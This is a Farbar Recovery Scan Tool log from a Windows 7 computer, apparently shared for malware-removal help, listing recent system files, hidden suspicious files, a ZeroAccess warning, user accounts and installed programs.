2016-09-22 23:58 - 2016-09-02 10:57 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-09-22 23:58 - 2016-09-02 10:55 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-09-22 23:58 - 2016-09-02 10:54 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-09-22 23:58 - 2016-09-02 10:54 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-09-22 23:58 - 2016-09-02 10:53 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-09-22 23:58 - 2016-09-02 10:53 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-09-22 23:58 - 2016-09-02 10:53 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-09-22 23:58 - 2016-09-02 10:49 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-09-22 23:58 - 2016-09-02 10:49 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-09-22 23:58 - 2016-09-02 10:49 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-09-22 23:58 - 2016-09-02 10:49 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-09-22 23:58 - 2016-09-02 10:49 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-09-22 23:58 - 2016-09-02 10:48 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 10:48 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 10:48 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-09-22 23:58 - 2016-09-02 10:48 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-09-22 23:58 - 2016-06-06 12:50 - 01483264 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2016-09-22 23:58 - 2016-06-06 12:50 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2016-09-22 23:58 - 2016-06-06 12:50 - 00190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2016-09-22 23:58 - 2016-06-06 12:50 - 00141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2016-09-22 23:58 - 2016-06-06 11:23 - 01176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2016-09-22 23:58 - 2016-06-06 11:23 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2016-09-22 23:58 - 2016-06-06 11:23 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2016-09-22 23:58 - 2016-06-06 11:23 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2016-09-22 23:58 - 2016-05-13 18:09 - 03156480 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2016-09-22 23:58 - 2016-05-13 18:09 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2016-09-22 23:58 - 2016-05-13 18:09 - 00098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2016-09-22 23:58 - 2016-05-13 18:07 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2016-09-22 23:58 - 2016-05-13 17:55 - 02607104 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2016-09-22 23:58 - 2016-05-13 17:53 - 00709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2016-09-22 23:58 - 2016-05-13 17:53 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2016-09-22 23:58 - 2016-05-13 17:52 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2016-09-22 23:58 - 2016-05-13 17:52 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2016-09-22 23:58 - 2016-05-13 17:52 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2016-09-22 23:58 - 2016-05-13 17:52 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2016-09-22 23:58 - 2016-05-13 17:50 - 00174080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2016-09-22 23:58 - 2016-05-13 17:38 - 00573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2016-09-22 23:58 - 2016-05-13 17:38 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2016-09-22 23:58 - 2016-05-13 17:38 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2016-09-22 23:58 - 2016-05-13 17:38 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2016-09-22 23:58 - 2016-05-12 13:14 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2016-09-22 23:58 - 2016-05-12 11:18 - 00090624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\olepro32.dll
2016-09-22 23:58 - 2016-05-12 11:18 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2016-09-22 23:58 - 2016-05-04 13:21 - 00114408 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2016-09-22 23:58 - 2016-05-04 13:17 - 03244032 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2016-09-22 23:58 - 2016-05-04 13:17 - 02365440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2016-09-22 23:58 - 2016-05-04 13:17 - 01806848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2016-09-22 23:58 - 2016-05-04 13:17 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2016-09-22 23:58 - 2016-05-04 13:17 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2016-09-22 23:58 - 2016-05-04 13:17 - 00025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2016-09-22 23:58 - 2016-05-04 13:17 - 00025088 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2016-09-22 23:58 - 2016-05-04 13:16 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-09-22 23:58 - 2016-05-04 13:16 - 00070144 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2016-09-22 23:58 - 2016-05-04 11:04 - 00128512 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2016-09-22 23:58 - 2016-05-04 10:55 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2016-09-22 23:57 - 2016-08-16 13:36 - 01009152 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2016-09-22 23:57 - 2016-08-15 22:48 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2016-09-22 23:57 - 2016-08-15 22:35 - 03218432 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-09-22 23:57 - 2016-08-12 12:26 - 00464896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2016-09-22 23:57 - 2016-08-12 12:26 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2016-09-22 23:57 - 2016-08-12 12:26 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2016-09-22 23:57 - 2016-08-05 11:30 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-09-22 23:57 - 2016-08-05 11:13 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2016-09-22 23:57 - 2016-07-07 11:36 - 01896168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2016-09-22 23:57 - 2016-07-07 11:36 - 00377576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2016-09-22 23:57 - 2016-07-07 11:36 - 00287976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2016-09-22 23:57 - 2016-07-07 11:08 - 00046080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpipreg.sys
2016-09-22 23:57 - 2016-07-01 11:31 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-09-22 23:57 - 2016-07-01 11:31 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2016-09-22 23:57 - 2016-07-01 11:13 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-09-22 23:57 - 2016-07-01 11:13 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2016-09-22 23:57 - 2016-06-25 20:35 - 00041704 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-09-22 23:57 - 2016-06-25 20:27 - 01208320 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-09-22 23:57 - 2016-06-25 20:27 - 00970240 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2016-09-22 23:57 - 2016-06-25 20:27 - 00756736 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-09-22 23:57 - 2016-06-25 20:27 - 00344576 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.dll
2016-09-22 23:57 - 2016-06-25 20:27 - 00166400 _____ (Microsoft Corporation) C:\Windows\system32\inetpp.dll
2016-09-22 23:57 - 2016-06-25 20:27 - 00022528 _____ (Microsoft Corporation) C:\Windows\system32\inetppui.dll
2016-09-22 23:57 - 2016-06-25 15:54 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2016-09-22 23:57 - 2016-06-25 15:53 - 00297472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntprint.dll
2016-09-22 23:57 - 2016-06-25 15:53 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.exe
2016-09-22 23:57 - 2016-06-25 15:53 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\wpnpinst.exe
2016-09-22 23:57 - 2016-06-25 15:41 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntprint.exe
2016-09-22 23:57 - 2016-06-22 09:06 - 00268800 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2016-09-22 23:57 - 2016-06-17 14:24 - 01490432 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-09-22 23:57 - 2016-06-17 14:24 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-09-22 23:57 - 2016-06-17 14:24 - 00544256 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-09-22 23:57 - 2016-06-17 14:24 - 00294912 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-09-22 23:57 - 2016-06-17 14:24 - 00219136 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-09-22 23:57 - 2016-06-17 14:24 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-09-22 23:49 - 2016-08-06 11:31 - 00877056 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2016-09-22 23:49 - 2016-08-06 11:15 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2016-09-21 21:47 - 2016-09-21 21:47 - 01042882 _____ C:\Users\Kevin\Desktop\Coord Design - Newsletter _1 (Kick-Off).pdf

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-19 00:13 - 2009-10-15 19:14 - 00000000 ____D C:\Users\Kevin\AppData\Roaming\uTorrent
2016-10-18 23:15 - 2009-07-14 00:45 - 00014848 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-10-18 23:15 - 2009-07-14 00:45 - 00014848 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-10-16 17:49 - 2014-09-01 21:28 - 00000000 ____D C:\Users\Kevin\AppData\Roaming\HandBrake
2016-10-16 01:00 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\inf
2016-10-15 12:41 - 2009-07-14 01:13 - 00786598 _____ C:\Windows\system32\PerfStringBackup.INI
2016-10-14 21:00 - 2009-07-14 01:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-10-14 20:57 - 2013-10-13 17:20 - 00054736 _____ C:\Windows\system32\Drivers\hitmanpro37.sys
2016-10-14 20:19 - 2014-01-05 17:57 - 00000000 ____D C:\Program Files (x86)\Steam
2016-10-14 10:30 - 2009-07-13 22:34 - 126091264 _____ C:\Windows\system32\config\software-old
2016-10-14 10:20 - 2009-07-14 00:45 - 05161792 _____ C:\Windows\system32\FNTCACHE.DAT
2016-10-14 09:23 - 2014-07-12 11:20 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-10-11 10:52 - 2011-06-29 22:35 - 00002086 _____ C:\Users\Kevin\Documents\Default.rdp
2016-10-11 10:52 - 2009-07-14 01:32 - 00000000 ____D C:\Windows\system32\FxsTmp
2016-10-03 18:52 - 2015-12-13 17:20 - 00002195 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-10-03 18:52 - 2015-12-13 17:20 - 00002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-10-02 01:45 - 2016-05-17 08:19 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2016-10-01 08:37 - 2009-07-14 01:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-09-25 21:41 - 2009-10-18 19:37 - 00000000 ____D C:\Users\Kevin\AppData\Roaming\Apple Computer
2016-09-25 20:03 - 2009-10-15 19:02 - 00134024 _____ C:\Users\Kevin\AppData\Local\GDIPFONTCACHEV1.DAT
2016-09-25 19:38 - 2012-09-01 18:58 - 00000132 _____ C:\Users\Kevin\AppData\Roaming\Adobe PNG Format CS6 Prefs
2016-09-24 11:07 - 2012-04-26 11:20 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-09-23 09:10 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\rescache
2016-09-23 08:05 - 2011-05-31 18:38 - 00000000 ____D C:\Users\Kevin\AppData\Local\Apple Computer
2016-09-23 07:30 - 2011-12-22 01:04 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-09-23 07:30 - 2011-12-22 01:04 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-09-23 07:27 - 2015-06-13 09:59 - 00000000 ____D C:\Windows\system32\appraiser
2016-09-23 00:11 - 2015-06-13 09:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-09-23 00:07 - 2013-07-13 06:18 - 00000000 ____D C:\Windows\system32\MRT
2016-09-23 00:00 - 2009-10-15 18:06 - 144199024 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe

==================== Files in the root of some directories =======

2015-06-05 16:06 - 2015-06-05 16:06 - 0000132 _____ () C:\Users\Kevin\AppData\Roaming\Adobe GIF Format CS6 Prefs
2012-09-01 18:58 - 2016-09-25 19:38 - 0000132 _____ () C:\Users\Kevin\AppData\Roaming\Adobe PNG Format CS6 Prefs
2015-08-16 22:05 - 2015-08-16 22:05 - 0000146 _____ () C:\Users\Kevin\AppData\Roaming\default.rss
2011-04-02 08:41 - 2011-04-02 08:42 - 0002510 ___SH () C:\Users\Kevin\AppData\Local\05re0r73hpdmdp8g0u15a6u6kmy4
2011-04-05 22:00 - 2011-04-05 22:01 - 0001450 ___SH () C:\Users\Kevin\AppData\Local\3lhqy33xpt11p
2011-12-22 00:21 - 2011-12-22 00:25 - 0001990 ___SH () C:\Users\Kevin\AppData\Local\707007m0n800p846g213h4tqw3n0
2012-08-30 18:05 - 2016-01-24 00:11 - 0001456 _____ () C:\Users\Kevin\AppData\Local\Adobe Save for Web 13.0 Prefs
2016-04-26 19:26 - 2016-04-26 19:26 - 0003584 _____ () C:\Users\Kevin\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-12-21 01:52 - 2011-12-21 01:52 - 0004116 ___SH () C:\Users\Kevin\AppData\Local\kodnqs0knj7e5e0j5eb8ve8x1wvh0sr13v473ngqw8sblj
2011-12-02 23:58 - 2011-12-03 00:04 - 0005606 ___SH () C:\Users\Kevin\AppData\Local\osoqsb0a0dkx0xtv8lrw5g400l4n
2011-03-30 06:43 - 2011-03-30 06:49 - 0011354 ___SH () C:\Users\Kevin\AppData\Local\r0t835ni0n1t18aj4n071sa4s7m
2012-08-18 21:00 - 2012-08-18 21:00 - 0002747 _____ () C:\Users\Kevin\AppData\Local\recently-used.xbel
2009-10-18 00:26 - 2015-01-13 18:42 - 0007597 _____ () C:\Users\Kevin\AppData\Local\Resmon.ResmonCfg
2009-10-23 21:22 - 2015-02-18 23:30 - 0000083 ___SH () C:\ProgramData\.zreglib
2011-04-02 08:41 - 2011-04-02 08:42 - 0002510 ___SH () C:\ProgramData\05re0r73hpdmdp8g0u15a6u6kmy4
2011-04-05 22:00 - 2011-04-05 22:01 - 0001450 ___SH () C:\ProgramData\3lhqy33xpt11p
2011-05-17 21:07 - 2011-11-11 10:59 - 0003694 ____H () C:\ProgramData\hpzinstall.log
2011-12-21 01:52 - 2011-12-21 01:52 - 0004116 ___SH () C:\ProgramData\kodnqs0knj7e5e0j5eb8ve8x1wvh0sr13v473ngqw8sblj
2011-12-02 23:58 - 2011-12-03 00:04 - 0005606 ___SH () C:\ProgramData\osoqsb0a0dkx0xtv8lrw5g400l4n
2011-03-30 06:43 - 2011-03-30 06:49 - 0011354 ___SH () C:\ProgramData\r0t835ni0n1t18aj4n071sa4s7m
2011-12-03 00:17 - 2011-12-03 00:19 - 0000112 ____H () C:\ProgramData\tP5544K4.dat

Files to move or delete:
====================
C:\ProgramData\tP5544K4.dat


Some files in TEMP:
====================
C:\Users\Kevin\AppData\Local\Temp\svchost.exe


==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
ATTENTION: ====> ZeroAccess. Use DeleteJunctionsIndirectory: C:\Windows\system64


LastRegBack: 2016-10-15 00:56

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-10-2016
Ran by Kevin (19-10-2016 00:13:51)
Running from C:\Users\Kevin\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2009-10-15 21:56:18)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1764878690-1872824068-2637823629-500 - Administrator - Disabled)
Guest (S-1-5-21-1764878690-1872824068-2637823629-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1764878690-1872824068-2637823629-1002 - Limited - Enabled)
Kevin (S-1-5-21-1764878690-1872824068-2637823629-1001 - Administrator - Enabled) => C:\Users\Kevin

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

"Nero SoundTrax Help (x32 Version: 4.0.15.0 - Nero AG) Hidden
µTorrent (HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\uTorrent) (Version: 3.4.9.42606 - BitTorrent Inc.)
64 Bit HP CIO Components Installer (Version: 6.2.1 - Hewlett-Packard) Hidden
Adobe Acrobat X Pro - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.1.14 - Adobe Systems)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.3.0.3670 - Adobe Systems Incorporated)
Adobe Creative Suite 6 Master Collection (HKLM-x32\...\{E8AD3069-9EB7-4BA8-8BFE-83F4E69355C0}) (Version: 6 - Adobe Systems Incorporated)
Adobe Flash Player 21 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 21.0.0.213 - Adobe Systems Incorporated)
Adobe Flash Player 21 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 21.0.0.242 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Media Player (HKLM-x32\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.15) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.15 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.9.149 - Adobe Systems, Inc.)
Adobe Widget Browser (HKLM-x32\...\com.adobe.WidgetBrowser) (Version: 2.0 Build 348 - Adobe Systems Incorporated.)
Adobe® Content Viewer (HKLM-x32\...\com.adobe.dmp.contentviewer) (Version: 2.9.0 - Adobe Systems Incorporated)
Advertising Center (x32 Version: 0.0.0.1 - Nero AG) Hidden
AIM 7 (HKLM-x32\...\AIM_7) (Version:  - )
AIM for Windows (HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\AIM) (Version:  - AOL Inc.)
ANT Drivers Installer x64 (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{29DB9165-5FC1-48F0-9188-26123F526848}) (Version: 5.0.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{5905C8CF-1C88-4478-A48E-4E458AD1BC7E}) (Version: 5.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{D4D86CB2-2370-4691-8272-3869EDED6C64}) (Version: 10.0.0.18 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Avi to Dvd Free Converter v6.7.0.225 (HKLM-x32\...\Avi to Dvd Free Converter_is1) (Version:  - AviToDvdFree.com Inc.)
bl (x32 Version: 1.0.0 - Your Company Name) Hidden
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
BufferChm (x32 Version: 130.0.331.000 - Hewlett-Packard) Hidden
C309g-m (x32 Version: 130.0.396.000 - Hewlett-Packard) Hidden
calibre (HKLM-x32\...\{6B49AD82-52A4-43D9-BA5D-76C2CFD11A30}) (Version: 0.8.65 - Kovid Goyal)
Castle of Illusion (HKLM\...\Steam App 227600) (Version:  - SEGA Studios Australia)
CCleaner (HKLM\...\CCleaner) (Version: 5.15 - Piriform)
CDisplay 1.8 (HKLM-x32\...\CDisplay_is1) (Version:  - dvd8n)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
ConvertHelper 3.0 (HKLM\...\{27CC6AB1-E72B-4179-AF1A-EAE507EBAF52}}_is1) (Version:  - DownloadHelper)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.4) (Version: 5.0.0.4 - Coupons.com Incorporated)
CPUID CPU-Z 1.72 (HKLM\...\CPUID CPU-Z_is1) (Version:  - )
Crazy Taxi (HKLM-x32\...\Steam App 71230) (Version:  - SEGA)
CutePDF Writer 2.8 (HKLM\...\CutePDF Writer Installation) (Version:  - )
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Defraggler (HKLM\...\Defraggler) (Version: 2.09 - Piriform)
Destinations (x32 Version: 130.0.0.0 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 130.0.372.000 - Hewlett-Packard) Hidden
DHTML Editing Component (HKLM-x32\...\{2EA870FA-585F-4187-903D-CB9FFD21E2E0}) (Version: 6.02.0002 - Microsoft Corporation)
DocProc (x32 Version: 140.0.99.000 - Hewlett-Packard) Hidden
DolbyFiles (x32 Version: 2.0 - Nero AG) Hidden
Download Updater (AOL Inc.) (HKLM-x32\...\SoftwareUpdUtility) (Version:  - AOL Inc.) <==== ATTENTION
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
EaseUS Partition Master 9.1.1 Home Edition (HKLM-x32\...\EaseUS Partition Master Home Edition_is1) (Version:  - EaseUS)
Elevated Installer (x32 Version: 4.1.16.0 - Garmin Ltd or its subsidiaries) Hidden
eReg (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
FileASSASSIN (HKLM-x32\...\FileASSASSIN) (Version: 1.06 - Malwarebytes)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Garmin Communicator Plugin x64 (HKLM\...\{550331CC-C34B-494F-BCDA-37CE4EF6E924}) (Version: 4.0.3 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{0733d53f-b41d-47cc-b336-d95751c4b2cb}) (Version: 4.1.16.0 - Garmin Ltd or its subsidiaries)
Garmin Express (x32 Version: 4.1.16.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin Express Tray (x32 Version: 4.1.16.0 - Garmin Ltd or its subsidiaries) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 53.0.2785.143 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
GPBaseService2 (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
HandBrake 0.9.9.1 (HKLM-x32\...\HandBrake) (Version: 0.9.9.1 - )
HL-2240 (HKLM-x32\...\{E2A97415-BD97-4867-B906-05E39E9EE51F}) (Version: 1.0.7.0 - Brother Industries, Ltd.)
HP Imaging Device Functions 13.0 (HKLM\...\HP Imaging Device Functions) (Version: 13.0 - HP)
HP Photosmart Premium C309g-m All-In-One Driver Software 13.0 Rel .6 (HKLM\...\{181AC4C7-B83C-4B5F-B566-E19BF2472429}) (Version: 13.0 - HP)
HP Solution Center 13.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 13.0 - HP)
HP Support Solutions Framework (HKLM-x32\...\{96D12EC9-720B-45FB-904C-36D6307A1C76}) (Version: 11.51.0048 - Hewlett-Packard Company)
HPPhotoGadget (x32 Version: 130.0.282.000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
hpWLPGInstaller (x32 Version: 130.0.303.000 - Hewlett-Packard) Hidden
iCloud (HKLM\...\{724A887F-2B55-4306-B6F9-8F0E7A04B1B5}) (Version: 5.2.2.87 - Apple Inc.)
ImagXpress (x32 Version: 7.0.74.0 - Nero AG) Hidden
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3939 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.4.65 - Intel Corporation)
Internet TV for Windows Media Center (HKLM-x32\...\{9D318C86-AF4C-409F-A6AC-7183FF4CF424}) (Version: 3.2.1.0 - Microsoft Corporation)
iTunes (HKLM\...\{9946A4F7-E0FD-4A33-82D1-06CBFFBBB9F9}) (Version: 12.5.1.21 - Apple Inc.)
Java 8 Update 91 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218091F0}) (Version: 8.0.910.14 - Oracle Corporation)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
K-Lite Codec Pack 11.4.0 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 11.4.0 - )
LG United Mobile Drivers (HKLM-x32\...\{B03954CC-E130-4E57-BC83-869978685902}) (Version: 3.3.0.0 - LG Electronics)
